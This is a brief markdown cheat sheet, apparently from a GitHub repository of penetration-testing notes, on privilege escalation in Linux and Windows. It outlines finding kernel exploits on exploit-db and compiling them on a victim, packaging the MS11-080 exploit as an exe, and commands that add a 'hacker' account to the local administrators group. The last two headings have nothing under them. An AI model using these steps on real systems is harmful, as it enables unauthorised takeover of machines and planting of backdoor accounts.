Skip to content

Latest commit

 

History

History
executable file
·
27 lines (14 loc) · 585 Bytes

Privilege_Escalation.md

File metadata and controls

executable file
·
27 lines (14 loc) · 585 Bytes

Privilege Escalation

Privilege Escalation Exploits in Linux

You have ssh credentials for a user and want to use machine to pivot but you do not have root privileges

  • Check kernel version
    • look under exploit db

download exploit to victim machine and compile

Privilege Escalation Exploit in Windows

MS11-080 Afd.sys python script

python pyinstaller.py --onefile ms11-080.py

  • to convert to exe

net user hacker hacker /add

net localgroup administrators hacker /add

Abusing weak Service Permissions on Windows

Abusing weak Service Permissions on Linux